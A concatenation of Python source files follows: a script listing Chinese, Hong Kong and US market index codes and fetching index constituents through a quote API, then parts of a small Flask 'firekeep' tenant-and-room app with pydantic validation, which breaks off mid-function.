242 SH.000938 中证民企
243 SH.000939 民企200
244 SH.000940 财富大盘
245 SH.000941 新能源
246 SH.000942 内地消费
247 SH.000943 内地基建
248 SH.000944 内地资源
249 SH.000945 内地运输
250 SH.000946 内地金融
251 SH.000947 内地银行
252 SH.000948 内地地产
253 SH.000949 内地农业
254 SH.000950 300基建
255 SH.000951 300银行
256 SH.000952 300地产
257 SH.000953 中证地企
258 SH.000954 地企100
259 SH.000955 中证国企
260 SH.000956 国企200
261 SH.000957 300运输
262 SH.000958 创业成长
263 SH.000959 银河99
264 SH.000960 中证龙头
265 SH.000961 中证上游
266 SH.000962 中证中游
267 SH.000963 中证下游
268 SH.000964 中证新兴
269 SH.000965 基本200
270 SH.000966 基本400
271 SH.000967 基本600
272 SH.000968 300周期
273 SH.000969 300非周
274 SH.000970 ESG40
275 SH.000971 等权90
276 SH.000972 300沪市
277 SH.000973 技术领先
278 SH.000974 800金融
279 SH.000975 钱江30
280 SH.000976 新华金牛
281 SH.000977 内地低碳
282 SH.000978 医药100
283 SH.000979 大宗商品
284 SH.000980 中证超大
285 SH.000981 300分层
286 SH.000982 500等权
287 SH.000983 智能资产
288 SH.000984 300等权
289 SH.000985 中证全指
290 SH.000986 全指能源
291 SH.000987 全指材料
292 SH.000988 全指工业
293 SH.000989 全指可选
294 SH.000990 全指消费
295 SH.000991 全指医药
296 SH.000992 全指金融
297 SH.000993 全指信息
298 SH.000994 全指电信
299 SH.000995 全指公用
300 SH.000996 领先行业
301 SH.000997 大消费
302 SH.000998 中证TMT
303 SH.000999 两岸三地
'''
'''SZ INDEX
0 SZ.399001 深证成指
1 SZ.399002 深成指R
2 SZ.399003 成份B指
3 SZ.399004 深证100R
4 SZ.399005 中小板指
5 SZ.399006 创业板指
6 SZ.399007 深证300
7 SZ.399008 中小300
8 SZ.399009 深证200
9 SZ.399010 深证700
10 SZ.399011 深证1000
11 SZ.399012 创业300
12 SZ.399013 深市精选
13 SZ.399015 中小创新
14 SZ.399016 深证创新
15 SZ.399017 SME创新
16 SZ.399018 创业创新
17 SZ.399100 新指数
18 SZ.399101 中小板综
19 SZ.399102 创业板综
20 SZ.399103 乐富指数
21 SZ.399106 深证综指
22 SZ.399107 深证A指
23 SZ.399108 深证B指
24 SZ.399231 农林指数
25 SZ.399232 采矿指数
26 SZ.399233 制造指数
27 SZ.399234 水电指数
28 SZ.399235 建筑指数
29 SZ.399236 批零指数
30 SZ.399237 运输指数
31 SZ.399238 餐饮指数
32 SZ.399239 IT指数
33 SZ.399240 金融指数
34 SZ.399241 地产指数
35 SZ.399242 商务指数
36 SZ.399243 科研指数
37 SZ.399244 公共指数
38 SZ.399248 文化指数
39 SZ.399249 综企指数
40 SZ.399298 深信中高
41 SZ.399299 深信中低
42 SZ.399300 沪深300
43 SZ.399301 深信用债
44 SZ.399302 深公司债
45 SZ.399303 国证2000
46 SZ.399305 基金指数
47 SZ.399306 深证ETF
48 SZ.399307 深证转债
49 SZ.399310 国证50
50 SZ.399311 国证1000
51 SZ.399312 国证300
52 SZ.399313 巨潮100
53 SZ.399314 巨潮大盘
54 SZ.399315 巨潮中盘
55 SZ.399316 巨潮小盘
56 SZ.399317 国证A指
57 SZ.399318 国证B指
58 SZ.399319 资源优势
59 SZ.399320 国证服务
60 SZ.399321 国证红利
61 SZ.399322 国证治理
62 SZ.399324 深证红利
63 SZ.399326 成长40
64 SZ.399328 深证治理
65 SZ.399330 深证100
66 SZ.399332 深证创新
67 SZ.399333 中小板R
68 SZ.399335 深证央企
69 SZ.399337 深证民营
70 SZ.399339 深证科技
71 SZ.399341 深证责任
72 SZ.399344 深证300R
73 SZ.399346 深证成长
74 SZ.399348 深证价值
75 SZ.399350 皖江30
76 SZ.399351 深报指数
77 SZ.399352 深报综指
78 SZ.399353 国证物流
79 SZ.399354 分析师指数
80 SZ.399355 长三角
81 SZ.399356 珠三角
82 SZ.399357 环渤海
83 SZ.399358 泰达指数
84 SZ.399359 国证基建
85 SZ.399360 新硬件
86 SZ.399361 国证商业
87 SZ.399362 国证民营
88 SZ.399363 计算机指
89 SZ.399364 中金消费
90 SZ.399365 国证农业
91 SZ.399366 国证大宗
92 SZ.399367 巨潮地产
93 SZ.399368 国证军工
94 SZ.399369 CBN-兴全
95 SZ.399370 国证成长
96 SZ.399371 国证价值
97 SZ.399372 大盘成长
98 SZ.399373 大盘价值
99 SZ.399374 中盘成长
100 SZ.399375 中盘价值
101 SZ.399376 小盘成长
102 SZ.399377 小盘价值
103 SZ.399378 南方低碳
104 SZ.399379 国证基金
105 SZ.399380 国证ETF
106 SZ.399381 1000能源
107 SZ.399382 1000材料
108 SZ.399383 1000工业
109 SZ.399384 1000可选
110 SZ.399385 1000消费
111 SZ.399386 1000医药
112 SZ.399387 1000金融
113 SZ.399388 1000信息
114 SZ.399389 国证通信
115 SZ.399390 1000公用
116 SZ.399391 投资时钟
117 SZ.399392 国证新兴
118 SZ.399393 国证地产
119 SZ.399394 国证医药
120 SZ.399395 国证有色
121 SZ.399396 国证食品
122 SZ.399397 OCT文化
123 SZ.399398 绩效指数
124 SZ.399399 中经GDP
125 SZ.399400 大中盘
126 SZ.399401 中小盘
127 SZ.399402 周期100
128 SZ.399403 防御100
129 SZ.399404 大盘低波
130 SZ.399405 大盘高贝
131 SZ.399406 中盘低波
132 SZ.399407 中盘高贝
133 SZ.399408 小盘低波
134 SZ.399409 小盘高贝
135 SZ.399410 苏州率先
136 SZ.399411 红利100
137 SZ.399412 国证新能
138 SZ.399413 国证转债
139 SZ.399415 I100
140 SZ.399416 I300
141 SZ.399417 新能源车
142 SZ.399418 国证国安
143 SZ.399419 国证高铁
144 SZ.399420 国证保证
145 SZ.399422 中关村A
146 SZ.399423 中关村50
147 SZ.399427 专利领先
148 SZ.399428 国证定增
149 SZ.399429 新丝路
150 SZ.399431 国证银行
151 SZ.399432 国证汽车
152 SZ.399433 国证交运
153 SZ.399434 国证传媒
154 SZ.399435 国证农牧
155 SZ.399436 国证煤炭
156 SZ.399437 国证证券
157 SZ.399438 国证电力
158 SZ.399439 国证油气
159 SZ.399440 国证钢铁
160 SZ.399441 生物医药
161 SZ.399481 企债指数
162 SZ.399550 央视50
163 SZ.399551 央视创新
164 SZ.399552 央视成长
165 SZ.399553 央视回报
166 SZ.399554 央视治理
167 SZ.399555 央视责任
168 SZ.399556 央视生态
169 SZ.399557 央视文化
170 SZ.399602 中小成长
171 SZ.399604 中小价值
172 SZ.399606 创业板R
173 SZ.399608 科技100
174 SZ.399610 TMT50
175 SZ.399611 中创100R
176 SZ.399612 中创100
177 SZ.399613 深证能源
178 SZ.399614 深证材料
179 SZ.399615 深证工业
180 SZ.399616 深证可选
181 SZ.399617 深证消费
182 SZ.399618 深证医药
183 SZ.399619 深证金融
184 SZ.399620 深证信息
185 SZ.399621 深证电信
186 SZ.399622 深证公用
187 SZ.399623 中小基础
188 SZ.399624 中创400
189 SZ.399625 中创500
190 SZ.399626 中创成长
191 SZ.399627 中创价值
192 SZ.399628 700成长
193 SZ.399629 700价值
194 SZ.399630 1000成长
195 SZ.399631 1000价值
196 SZ.399632 深100EW
197 SZ.399633 深300EW
198 SZ.399634 中小板EW
199 SZ.399635 创业板EW
200 SZ.399636 深证装备
201 SZ.399637 深证地产
202 SZ.399638 深证环保
203 SZ.399639 深证大宗
204 SZ.399640 创业基础
205 SZ.399641 深证新兴
206 SZ.399642 中小新兴
207 SZ.399643 创业新兴
208 SZ.399644 深证时钟
209 SZ.399645 100低波
210 SZ.399646 深消费50
211 SZ.399647 深医药50
212 SZ.399648 深证GDP
213 SZ.399649 中小红利
214 SZ.399650 中小治理
215 SZ.399651 中小责任
216 SZ.399652 中创高新
217 SZ.399653 深证龙头
218 SZ.399654 深证文化
219 SZ.399655 深证绩效
220 SZ.399656 100绩效
221 SZ.399657 300绩效
222 SZ.399658 中小绩效
223 SZ.399659 深成指EW
224 SZ.399660 中创EW
225 SZ.399661 深证低波
226 SZ.399662 深证高贝
227 SZ.399663 中小低波
228 SZ.399664 中小高贝
229 SZ.399665 中创低波
230 SZ.399666 中创高贝
231 SZ.399667 创业板G
232 SZ.399668 创业板V
233 SZ.399669 深证农业
234 SZ.399670 深周期50
235 SZ.399671 深防御50
236 SZ.399672 深红利50
237 SZ.399673 创业板50
238 SZ.399674 深A医药
239 SZ.399675 深互联网
240 SZ.399676 深医药EW
241 SZ.399677 深互联EW
242 SZ.399678 深次新股
243 SZ.399679 深证200R
244 SZ.399680 深成能源
245 SZ.399681 深成材料
246 SZ.399682 深成工业
247 SZ.399683 深成可选
248 SZ.399684 深成消费
249 SZ.399685 深成医药
250 SZ.399686 深成金融
251 SZ.399687 深成信息
252 SZ.399688 深成电信
253 SZ.399689 深成公用
254 SZ.399690 中小专利
255 SZ.399691 创业专利
256 SZ.399692 创业低波
257 SZ.399693 安防产业
258 SZ.399694 创业高贝
259 SZ.399695 深证节能
260 SZ.399696 深证创投
261 SZ.399697 中关村60
262 SZ.399698 优势成长
263 SZ.399699 金融科技
264 SZ.399701 深证F60
265 SZ.399702 深证F120
266 SZ.399703 深证F200
267 SZ.399704 深证上游
268 SZ.399705 深证中游
269 SZ.399706 深证下游
270 SZ.399707 CSSW证券
271 SZ.399802 500深市
272 SZ.399803 工业4.0
273 SZ.399804 中证体育
274 SZ.399805 互联金融
275 SZ.399806 环境治理
276 SZ.399807 高铁产业
277 SZ.399808 中证新能
278 SZ.399809 保险主题
279 SZ.399810 CSSW传媒
280 SZ.399811 CSSW电子
281 SZ.399812 养老产业
282 SZ.399813 中证国安
283 SZ.399814 大农业
284 SZ.399817 生态100
285 SZ.399901 小康指数
286 SZ.399902 中证流通
287 SZ.399903 中证100
288 SZ.399904 中证200
289 SZ.399905 中证500
290 SZ.399906 中证800
291 SZ.399907 中证700
292 SZ.399908 300能源
293 SZ.399909 300材料
294 SZ.399910 300工业
295 SZ.399911 300可选
296 SZ.399912 300消费
297 SZ.399913 300医药
298 SZ.399914 300金融
299 SZ.399915 300信息
300 SZ.399916 300电信
301 SZ.399917 300公用
302 SZ.399918 300成长
303 SZ.399919 300价值
304 SZ.399920 300R成长
305 SZ.399921 300R价值
306 SZ.399922 中证红利
307 SZ.399923 公司债指
308 SZ.399924 分离债指
309 SZ.399925 基本面50
310 SZ.399926 中证央企
311 SZ.399927 央企100
312 SZ.399928 中证能源
313 SZ.399929 中证材料
314 SZ.399930 中证工业
315 SZ.399931 中证可选
316 SZ.399932 中证消费
317 SZ.399933 中证医药
318 SZ.399934 中证金融
319 SZ.399935 中证信息
320 SZ.399936 中证电信
321 SZ.399937 中证公用
322 SZ.399938 中证民企
323 SZ.399939 民企200
324 SZ.399940 财富大盘
325 SZ.399941 新能源
326 SZ.399942 内地消费
327 SZ.399943 内地基建
328 SZ.399944 内地资源
329 SZ.399945 内地运输
330 SZ.399946 内地金融
331 SZ.399947 内地银行
332 SZ.399948 内地地产
333 SZ.399949 内地农业
334 SZ.399950 300基建
335 SZ.399951 300银行
336 SZ.399952 300地产
337 SZ.399953 中证地企
338 SZ.399954 地企100
339 SZ.399955 中证国企
340 SZ.399956 国企200
341 SZ.399957 300运输
342 SZ.399958 创业成长
343 SZ.399959 军工指数
344 SZ.399960 中证龙头
345 SZ.399961 中证上游
346 SZ.399962 中证中游
347 SZ.399963 中证下游
348 SZ.399964 中证新兴
349 SZ.399965 800地产
350 SZ.399966 800非银
351 SZ.399967 中证军工
352 SZ.399968 300周期
353 SZ.399969 300非周
354 SZ.399970 移动互联
355 SZ.399971 中证传媒
356 SZ.399972 300深市
357 SZ.399973 中证国防
358 SZ.399974 国企改革
359 SZ.399975 证券公司
360 SZ.399976 CS新能车
361 SZ.399977 内地低碳
362 SZ.399978 医药100
363 SZ.399979 大宗商品
364 SZ.399980 中证超大
365 SZ.399981 300分层
366 SZ.399982 500等权
367 SZ.399983 地产等权
368 SZ.399984 300等权
369 SZ.399985 中证全指
370 SZ.399986 中证银行
371 SZ.399987 中证酒
372 SZ.399989 中证医疗
373 SZ.399990 煤炭等权
374 SZ.399991 一带一路
375 SZ.399992 CSWD并购
376 SZ.399993 CSWD生科
377 SZ.399994 信息安全
378 SZ.399995 基建工程
379 SZ.399996 智能家居
380 SZ.399997 中证白酒
381 SZ.399998 中证煤炭
'''
''' HK INDEX
code name
0 HK.100000 黄金期货
1 HK.100100 石油期货
2 HK.100200 白银期货
3 HK.100300 铂金期货
4 HK.100400 MTW
5 HK.100500 TCB
6 HK.100600 TCE
7 HK.100700 TCF
8 HK.100701 人民币汇率
9 HK.100702 欧美汇率
10 HK.100703 澳美汇率
11 HK.800000 恒生指数
12 HK.800100 国企指数
13 HK.800121 标普香港大型股指数
14 HK.800122 沪深300指数
15 HK.800123 中证香港100指数
16 HK.800124 中证两岸三地500指数
17 HK.800125 恒指波幅指数
18 HK.800126 中证内地消费指数
19 HK.800127 中证香港内地民营企业指数
20 HK.800129 中证香港上市可交易内地地产指数
21 HK.800130 中证香港上市可交易内地消费指数
22 HK.800131 中证海外内地股港元指数
23 HK.800132 中证香港红利港币指数
24 HK.800133 中证锐联香港基本面50港币指数
25 HK.800134 中证香港中盘精选港币指数
26 HK.800135 中证香港内地股港元指数
27 HK.800136 中华交易服务中国120指数
28 HK.800137 中华交易服务中国A80指数
29 HK.800138 中华交易服务中国香港内地指数
30 HK.800139 中证香港内地国有企业指数
31 HK.800140 标普香港创业板指数
32 HK.800141 上证180指数
33 HK.800142 上证180公司治理指数
34 HK.800143 上证380指数
35 HK.800144 上证50指数
36 HK.800145 上证大宗商品股票指数
37 HK.800146 上证综合指数
38 HK.800147 上证红利指数
39 HK.800148 上证龙头企业指数
40 HK.800149 上证中盘指数
41 HK.800150 上证超级大盘指数
42 HK.800151 红筹指数
43 HK.800152 恒生金融分类指数
44 HK.800153 恒生公用分类指数
45 HK.800154 恒生地产分类指数
46 HK.800155 恒生工商分类指数
47 HK.800200 道琼斯指数
'''
''' US INDEX
0 US..IXIC 纳斯达克综合指数
1 US..DJI 道琼斯指数
2 US..DJT 道琼斯交通运输平均指数
3 US..DJU 道琼斯公用事业平均指数
4 US..DJUS 道琼斯美国指数
5 US..DJUSAE 道琼斯美国航空航天与国防指数
6 US..DJUSAF "Dow Jones US Delivery Services Index
"
7 US..DJUSAG "Dow Jones US Asset Managers Index
"
8 US..DJUSAI 道琼斯美国电子设备指数
9 US..DJUSAL 道琼斯美铝指数
10 US..DJUSAM 道琼斯美国医疗器械指数
11 US..DJUSAP 道琼斯美国汽车零部件指数
12 US..DJUSAR 道琼斯美国航空指数
13 US..DJUSAS 道琼斯美国航空航天指数
14 US..DJUSAT 道琼斯美国汽车零部件指数
15 US..DJUSAU 道琼斯美国汽车指数
16 US..DJUSAV 道琼斯美国媒体代理指数
17 US..DJUSBC 道琼斯美国广播娱乐指数
18 US..DJUSBD 道琼斯美国建筑材料及灯具指数
19 US..DJUSBE "Dow Jones US Business Training & Employment Agencies Index
"
20 US..DJUSBK 道琼斯美国银行指数
21 US..DJUSBM 道琼斯美国基础材料指数
22 US..DJUSBS 道琼斯美国基础资源指数
23 US..DJUSBT 道琼斯美国生物技术指数
24 US..DJUSBV 道琼斯美国饮料指数
25 US..DJUSCA 道琼斯美国赌博指数
26 US..DJUSCC 道琼斯美国商品化学品指数
27 US..DJUSCF 道琼斯美国服装配饰指数
28 US..DJUSCG 道琼斯美国旅游休闲指数
29 US..DJUSCH 道琼斯美国化学品指数
30 US..DJUSCL 道琼斯美国煤炭指数
31 US..DJUSCM 道琼斯美国个人产品指数
32 US..DJUSCN 道琼斯美国建筑材料指数
33 US..DJUSCP 道琼斯美国集装箱和包装指数
34 US..DJUSCR 道琼斯美国计算机硬件指数
35 US..DJUSCS 道琼斯美国专业消费者服务指数
36 US..DJUSCT 道琼斯美国电讯设备指数
37 US..DJUSCX 道琼斯美国特种化学品指数
38 US..DJUSCY 道琼斯美国消费者服务指数
39 US..DJUSDB 道琼斯美国酿酒商指数
40 US..DJUSDN 道琼斯美国国防指数
41 US..DJUSDR 道琼斯美国食品和药物零售商指数
42 US..DJUSDS 道琼斯美国工业供应商指数
43 US..DJUSDT "Dow Jones US Diversified REITs
"
44 US..DJUSDV 道琼斯美国计算机服务指数
45 US..DJUSEC 道琼斯美国电气元件及设备指数
46 US..DJUSEE 道琼斯美国电子电气设备指数
47 US..DJUSEH 道琼斯美国房地产控股与发展指数
48 US..DJUSEN 道琼斯美国石油和天然气指数
49 US..DJUSES 道琼斯美国房地产服务指数
50 US..DJUSEU 道琼斯美国电力指数
51 US..DJUSFA "Dow Jones US Financial Administration Index
"
52 US..DJUSFB 道琼斯美国食品和饮料指数
53 US..DJUSFC 道琼斯美国固定电话电讯指数
54 US..DJUSFD 道琼斯美国食品零售商和批发商指数
55 US..DJUSFE 道琼斯美国工业机械指数
56 US..DJUSFH 道琼斯美国家具指数
57 US..DJUSFI 道琼斯美国金融服务指数
58 US..DJUSFN 道琼斯美国金融指数
59 US..DJUSFO 道琼斯美国食品生产商指数
60 US..DJUSFP 道琼斯美国食品指数
61 US..DJUSFR 道琼斯美国林业与纸业指数
62 US..DJUSFT 道琼斯美国鞋业指数
63 US..DJUSFV 道琼斯美国金融服务综合指数
64 US..DJUSGF 道琼斯美国通用财务指数
65 US..DJUSGI 道琼斯美国通用工业指数
66 US..DJUSGL "Dow Jones US Large-Cap Growth Index
"
67 US..DJUSGM "Dow Jones US Mid-Cap Growth Index
"
68 US..DJUSGR 道琼斯美国增长指数
69 US..DJUSGS "Dow Jones US Small-Cap Growth Index
"
70 US..DJUSGT 道琼斯美国综合零售商指数
71 US..DJUSGU 道琼斯美国天然气分布指数
72 US..DJUSHB 道琼斯美国家居建筑指数
73 US..DJUSHC 道琼斯美国医疗保健指数
74 US..DJUSHD 道琼斯美国耐用家用产品指数
75 US..DJUSHG 道琼斯美国家庭用品指数
76 US..DJUSHI 道琼斯美国家居零售商指数
77 US..DJUSHL "Dow Jones US Hotel & Lodging REITs Index
"
78 US..DJUSHN 道琼斯美国无保障住户产品指数
79 US..DJUSHP 道琼斯美国医疗保健提供者指数
80 US..DJUSHR 道琼斯美国商用车辆和卡车指数
81 US..DJUSHV 道琼斯美国重型建筑指数
82 US..DJUSIB 道琼斯美国保险经纪人指数
83 US..DJUSID 道琼斯美国多元化工业指数
84 US..DJUSIF 道琼斯美国全线保险指数
85 US..DJUSIG 道琼斯美国工业产品与服务
86 US..DJUSIL 道琼斯美国人寿保险指数
87 US..DJUSIM 道琼斯美国工业金属指数
88 US..DJUSIN 道琼斯美国工业指数
89 US..DJUSIO 道琼斯美国工业和房地产信托指数
90 US..DJUSIP 道琼斯美国财险保险指数
91 US..DJUSIQ 道琼斯美国工业工程指数
92 US..DJUSIR 道琼斯美国保险指数
93 US..DJUSIS 道琼斯美国支持服务指数
94 US..DJUSIT 道琼斯美国工业交通指数
95 US..DJUSIU 道琼斯美国再保险指数
96 US..DJUSIV 道琼斯美国商业支持服务指数
97 US..DJUSIX 道琼斯美国非人寿保险指数
98 US..DJUSL 道琼斯美国大盘指数
99 US..DJUSLE 道琼斯美国休闲用品指数
100 US..DJUSLG 道琼斯美国酒店指数
101 US..DJUSLTR "Dow Jones US Large-Cap TR Index (EOD)
"
102 US..DJUSLW "Dow Jones US Low Cap Index
"
103 US..DJUSM "Dow Jones US Mid Cap Index
"
104 US..DJUSMC 道琼斯美国医疗保健设备及服务指数
105 US..DJUSME 道琼斯美国媒体指数
106 US..DJUSMF 道琼斯美国抵押贷款融资指数
107 US..DJUSMG 道琼斯美国矿业指数
108 US..DJUSMR 道琼斯美国抵押房地产信托指数
109 US..DJUSMS 道琼斯美国医疗用品指数
110 US..DJUSMT 道琼斯美国海运交通指数
111 US..DJUSMU 道琼斯美国多功能指数
112 US..DJUSNC 道琼斯美国消费品指数
113 US..DJUSNF 道琼斯美国有色金属指数
114 US..DJUSNG 道琼斯美国个人及家庭用品指数
115 US..DJUSNS 道琼斯美国互联网指数
116 US..DJUSOE 道琼斯美国电子办公设备指数
117 US..DJUSOG 道琼斯美国石油和天然气生产商指数
118 US..DJUSOI 道琼斯美国石油设备与服务指数
119 US..DJUSOL 道琼斯美国综合油气指数
120 US..DJUSOQ 道琼斯美国石油设备,服务与分销指数
121 US..DJUSOS 道琼斯美国勘探与生产指数
122 US..DJUSPB 道琼斯美国出版指数
123 US..DJUSPC 道琼斯美国废物处理服务指数
124 US..DJUSPG 道琼斯美国个人商品指数
125 US..DJUSPL 道琼斯美国管道指数
126 US..DJUSPM 道琼斯美国黄金矿业指数
127 US..DJUSPN 道琼斯美国制药与生物技术指数
128 US..DJUSPP 道琼斯美国纸业指数
129 US..DJUSPR 道琼斯美国医药指数
130 US..DJUSPT 道琼斯美国铂金与贵金属指数
131 US..DJUSRA 道琼斯美国服装零售商指数
132 US..DJUSRB "Dow Jones US Broadline Retailers Index
"
133 US..DJUSRD 道琼斯美国药物零售商指数
134 US..DJUSRE "Dow Jones US Real Estate Index
"
135 US..DJUSRH 道琼斯美国房地产投资与服务指数
136 US..DJUSRI 道琼斯美国房地产投资信托指数
137 US..DJUSRL "Dow Jones US Retail REITs Index
"
138 US..DJUSRN "Dow Jones US Residential REITs Index
"
139 US..DJUSRP 道琼斯美国娱乐产品指数
140 US..DJUSRQ 道琼斯美国娱乐服务指数
141 US..DJUSRR 道琼斯美国铁路指数
142 US..DJUSRS 道琼斯美国专业零售商指数
143 US..DJUSRT 道琼斯美国零售指数
144 US..DJUSRU 道琼斯美国餐馆和酒吧指数
145 US..DJUSS "Dow Jones US Small Cap Index
"
146 US..DJUSSB 道琼斯美国投资服务公司
147 US..DJUSSC 道琼斯美国半导体指数
148 US..DJUSSD 道琼斯美国软饮料指数
149 US..DJUSSF 道琼斯美国消费者金融指数
150 US..DJUSSP 道琼斯美国专业金融指数
151 US..DJUSSR "Dow Jones US Specialty REITs Index
"
152 US..DJUSST 道琼斯美国钢铁指数
153 US..DJUSSV 道琼斯美国软件与计算机服务指数
154 US..DJUSSW 道琼斯美国软件指数
155 US..DJUSTB 道琼斯美国烟草指数
156 US..DJUSTC 道琼斯美国高科技指数
157 US..DJUSTK 道琼斯美国卡车指数
158 US..DJUSTL 道琼斯美国电讯指数
159 US..DJUSTP "Dow Jones US Top Cap Index
"
160 US..DJUSTQ 道琼斯美国技术五金设备指数
161 US..DJUSTR 道琼斯美轮胎指数
162 US..DJUSTS 道琼斯美国运输服务指数
163 US..DJUSTT 道琼斯美国旅游与旅游指数
164 US..DJUSTY 道琼斯美国玩具指数
165 US..DJUSUO "Dow Jones US Gas"
166 US..DJUSUT 道琼斯美国公用事业指数
167 US..DJUSVA 道琼斯美国价值指数
168 US..DJUSVE 道琼斯美国常规电力指数
169 US..DJUSVL "Dow Jones US Large-Cap Value Index
"
170 US..DJUSVM "Dow Jones US Mid-Cap Value Index
"
171 US..DJUSVN 道琼斯美国酿酒商与葡萄酒指数
172 US..DJUSVS "Dow Jones US Small-Cap Value Index
"
173 US..DJUSWC 道琼斯美国移动通信指数
174 US..DJUSWU 道琼斯美国水资源指数
175 US..INX 标普500指数
176 US..NDX 纳斯达克100
177 US..SP100 标普100指数
178 US..SPCMI 标普完整指数
179 US..W5000FLT "Wilshire 5000 Total Market Index
"
180 US..W5KLC "Wilshire US Large Cap
"
181 US..W5KMC "Wilshire US Mid Cap
"
182 US..W5KMICRO "Wilshire US Micro Cap
"
183 US..W5KSC "Wilshire US Small Cap
"
184 US..AEX 荷兰AEX指数
185 US..AS51 澳大利亚指数
186 US..ASE 希腊指数
187 US..ATX 奥地利指数
188 US..BEL20 比利时指数
189 US..CAC 法国指数
190 US..CASE 埃及指数
191 US..CSEALL 斯里兰卡指数
192 US..DAX 德国DAX指数
193 US..FBMKLC 马来西亚指数
194 US..FSSTI 新加坡指数
195 US..FTSEMIB 意大利指数
196 US..HEX 芬兰指数
197 US..IBEX 西班牙指数
198 US..IBOV 巴西指数
199 US..ICEXI 冰岛指数
200 US..INDEXCF 俄罗斯指数
201 US..ISEQ 爱尔兰指数
202 US..JCI 印尼综合指数
203 US..KFX 丹麦指数
204 US..kospi 韩国指数
205 US..KSE100 巴基斯坦指数
206 US..LUXXX 卢森堡指数
207 US..MEXBOL 墨西哥指数
208 US..NKY 日经225指数
209 US..NZSE50FG 新西兰指数
210 US..OBX 挪威指数
211 US..OMX 瑞典OMX指数
212 US..PCOMP 菲律宾指数
213 US..PX 捷克指数
214 US..SENSEX 印度孟买指数
215 US..SET 泰国指数
216 US..SMI 瑞士市场指数
217 US..SPTSX 加拿大指数
218 US..TWSE 台湾加权指数
219 US..UKX 英国指数
220 US..VNINDEX 越南指数
221 US..WIG 波兰指数
'''
def enum_all_index(ip, port):
quote_ctx = ft.OpenQuoteContext(ip, port)
ret, data_frame = quote_ctx.get_stock_basicinfo(market=ft.Market.SH, stock_type=ft.SecurityType.IDX)
data_frame.to_csv("index_sh.txt", index=True, sep=' ', columns=['code', 'name'])
print('market SH index data saved!')
ret, data_frame = quote_ctx.get_stock_basicinfo(market=ft.Market.SZ, stock_type=ft.SecurityType.IDX)
data_frame.to_csv("index_sz.txt", index=True, sep=' ', columns=['code', 'name'])
print('market SZ index data saved!')
ret, data_frame = quote_ctx.get_stock_basicinfo(market=ft.Market.HK, stock_type=ft.SecurityType.IDX)
data_frame.to_csv("index_hk.txt", index=True, sep=' ', columns=['code', 'name'])
print('market HK index data saved!')
ret, data_frame = quote_ctx.get_stock_basicinfo(market=ft.Market.US, stock_type=ft.SecurityType.IDX)
data_frame.to_csv("index_us.txt", index=True, sep=' ', columns=['code', 'name'])
print('market US index data saved!')
quote_ctx.close()
def get_index_stocks(ip, port, code):
quote_ctx = ft.OpenQuoteContext(ip, port)
ret, data_frame = quote_ctx.get_plate_stock(code)
quote_ctx.close()
return ret, data_frame
if __name__ == "__main__":
api_ip = '192.168.127.12' #''192.168.127.12'
api_port = 11111
# enum_all_index(api_ip, api_port)
print('SH.000001 上证指数 \n')
print(get_index_stocks(api_ip, api_port, 'SH.000001'))
print('SZ.399006 创业板指\n')
print(get_index_stocks(api_ip, api_port, 'SZ.399006'))
print('HK.800000 恒生指数 \n')
print(get_index_stocks(api_ip, api_port, 'HK.800000'))
print('US..DJI 道琼斯指数\n')
print(get_index_stocks(api_ip, api_port, 'US..DJI'))
|
neil-vqa/firekeep | firekeep/models.py | class MaximumNumberOfOccupantsReached(Exception):
pass
class Tenant:
def __init__(self, first_name: str, last_name: str, student_id_number: int) -> None:
self.first_name = first_name
self.last_name = last_name
self.student_id_number = student_id_number
@property
def full_name(self) -> str:
return self.first_name + self.last_name
class Room:
def __init__(self, room_number: str, max_capacity: int) -> None:
self.room_number = room_number
self.max_capacity = max_capacity
self.occupants = set()
@property
def number_of_occupants(self) -> int:
return len(self.occupants)
def add_occupant(self, occupant: Tenant):
if self.can_add_more_occupants:
self.occupants.add(occupant)
else:
raise MaximumNumberOfOccupantsReached
@property
def can_add_more_occupants(self) -> bool:
return self.number_of_occupants < self.max_capacity
def assign_to_room(tenant: Tenant, room: Room):
try:
room.add_occupant(tenant)
except MaximumNumberOfOccupantsReached:
raise MaximumNumberOfOccupantsReached(
f"Can no longer add {tenant.full_name} to Room {room.room_number}."
)
|
neil-vqa/firekeep | firekeep/__init__.py | __version__ = "0.1.0"
from .app import app
|
neil-vqa/firekeep | firekeep/app.py | from flask import Flask, jsonify, request
from flask_cors import CORS
from firekeep import orm, services
from firekeep.db_session import Session
from firekeep.keep import RoomCreate, RoomResponse, TenantCreate, TenantResponse, keep
app = Flask(__name__)
cors = CORS(app, resources={r"/api/*": {"origins": "*"}})
orm.run_mappers()
@app.get("/api/tenants")
@keep(response_model=TenantResponse)
def get_tenant_list():
tenants = [
{
"first_name": "jefford",
"last_name": "librado",
"student_id_number": 951,
"id": 1,
},
{
"first_name": "eds",
"last_name": "decena",
"student_id_number": 753,
"id": 2,
},
]
return jsonify(tenants)
@app.get("/api/tenants/<int:id>")
@keep(response_model=TenantResponse)
def get_tenant(id: int):
tenant = {
"first_name": "wins",
"last_name": "sabellona",
"student_id_number": 963,
"id": id,
}
return jsonify(tenant)
@app.post("/api/rooms")
@keep(response_model=RoomResponse, request_model=RoomCreate)
def create_room():
request.json["id"] = 951
return request.json
@app.post("/api/assign")
def assign_tenant():
try:
msg = services.assign_tenant_to_room(
request.json["room_number"],
request.json["room_id"],
request.json["tenant_id"],
Session(),
)
return jsonify(msg)
except Exception:
raise
|
neil-vqa/firekeep | firekeep/keep.py | <filename>firekeep/keep.py
"""
This module contains the keep function, and classes that mirror the domain models.
The keep function is to be used as a decorator for view functions, and is provided with
appropriate response and request models.
The purpose of building this is to act as the first line of defense against the request data,
and the final layer of check for outgoing data in the response.
"""
import functools
from typing import Callable, List, Optional, Set, Type
from flask import abort, after_this_request, jsonify, request
from pydantic import BaseModel, ValidationError, parse_obj_as
from firekeep.models import Room
# Mirrored models from the domain inherit from this class. Sets global config.
class PydanticBase(BaseModel):
class Config:
extra = "forbid"
class TenantBaseModel(PydanticBase):
first_name: str
last_name: str
student_id_number: int
class TenantResponse(TenantBaseModel):
id: int
class Config:
extra = "ignore" # set to avoid conflict with extra fields that the ORM might return
class TenantCreate(TenantBaseModel):
pass
class RoomBaseModel(PydanticBase):
room_number: str
max_capacity: int
class RoomResponse(RoomBaseModel):
occupants: Set[TenantResponse]
class Config:
extra = "ignore"
class RoomCreate(RoomBaseModel):
occupants: Set[TenantCreate]
def keep(
response_model: Optional[Type[BaseModel]],
request_model: Optional[Type[BaseModel]] = None,
) -> Callable:
def parser(func) -> Callable:
@functools.wraps(func)
def parse_with_pydantic_wrapper(*args, **kwargs):
try:
if request_model:
request_model(**request.json) # parsing the request data
@after_this_request
def parse_response(response):
# check if response is a collection
